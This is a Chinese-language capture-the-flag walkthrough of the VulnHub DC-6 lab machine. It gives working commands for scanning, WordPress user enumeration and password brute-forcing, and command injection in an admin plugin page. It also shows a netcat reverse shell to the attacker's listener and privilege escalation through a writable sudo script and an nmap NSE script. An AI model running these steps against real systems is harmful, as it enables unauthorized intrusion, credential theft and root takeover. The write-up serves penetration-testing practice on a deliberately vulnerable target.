导入
下载完成后在Vmware中导入。
下载地址:
官方网站:DC: 6 ~ VulnHub
夸克网盘:https://pan.quark.cn/s/e6b5b7c6524a 提取码:1jJS
信息收集
先扫描一下靶机的ip地址
nmap -sn 192.168.31.0/24
接着扫描一下开放的端口
nmap -sV -p- 192.168.31.110
开放了22和80端口。
打开浏览器看看,发现输入ip地址回车后自动跳转到了wordy,这和DC-2是相同的问题,需要修改本地的hosts文件。
vim /etc/hosts
保存后再次访问就可以了,可以看出这是wordpress的站点。
使用dirsearch扫描一下站点目录,看看有没有什么有用的东西。
dirsearch -u 'http://wordy/'看了一下,就只有个登录页面能用上。
开始渗透
咱们现在要想办法去获取后台的账号密码,咱们使用wpscan去获取登录用户名。
wpscan --url 'http://wordy/' -e u
先把这5个用户名保存到一个文件中。
接着去获得密码字典。
DC-6的下载页面下面有这么个提示:

rockyou.txt是kali中自带的一款字典,只不过这个字典特别大,根据这个提示对这个字典进行精简。精简之前先解压这个字典,默认是压缩包形式。
#解压:
gzip -d rockyou.txt.gz
#精简:
cat /usr/share/wordlists/rockyou.txt | grep k01 > /home/kali/Desktop/password.txt我将精简后的字典放到了桌面上。
接着就可以用wpscan进行暴破。
wpscan --url 'http://wordy/' -U /home/kali/Desktop/1.txt -P /home/kali/Desktop/passwords.txt
#/home/kali/Desktop/1.txt是前面保存的用户名的文件
成功暴破出来一个用户,咱们登录到后台去看看。

登录成功,咱们找找哪里能被咱们利用。

发现这个页面下存在Linux的命令执行,咱们试试用bp抓包后修改命令看看行不行

把ip地址换成127.0.0.1 | whoami试试,看看能不能显示出是哪个用户。

成功显示了,那咱们只需要在这里使用nc来反向shell就行了。
先在终端中提前打开监听
nc -lvvp 4444
接着修改命令发送就行。
nc 192.168.31.201 4444 -e /bin/bash成功后就可以连到shell 。

使用python获取一个可交互的shell。
python -c 'import pty; pty.spawn("/bin/bash")'接着就找找有没有什么有用的文件。
在/home/mark/stuff中找到一个文件,文件中显示了graham用户的密码。

使用ssh连接,用graham用户,或者直接su - graham切换用户。
在这个用户中输入sudo -l后显示了一个备份的脚本,咱们可以利用这个脚本.

先cd到这个脚本目录下,接着输入下面的命令
echo "/bin/bash" >> backups.sh
输入完后cat一下确认有没有写入。
写入成功后执行这个命令,但是提示不能使用当前用户运行。

使用jens用户执行这个文件。
sudo -u jens ./backups.sh
执行完成后切换到了jens用户。继续sudo -l看看可以执行哪些命令。

执行完成后发现可以使用nmap,询问AI后得知nmap也可以运行文件,那就可以写一个root的shell文件让nmap运行。
# 写入标准lua调用os.execute
echo 'os.execute("/bin/bash")' > /tmp/pwn.nse
sudo nmap --script /tmp/pwn.nse
执行完成后就进入了root用户。但是我这里遇到一个bug,输入字符后不显示,但是回车后显示出来了,不知道是什么问题。
进入/root目录读取flag文件,结束!
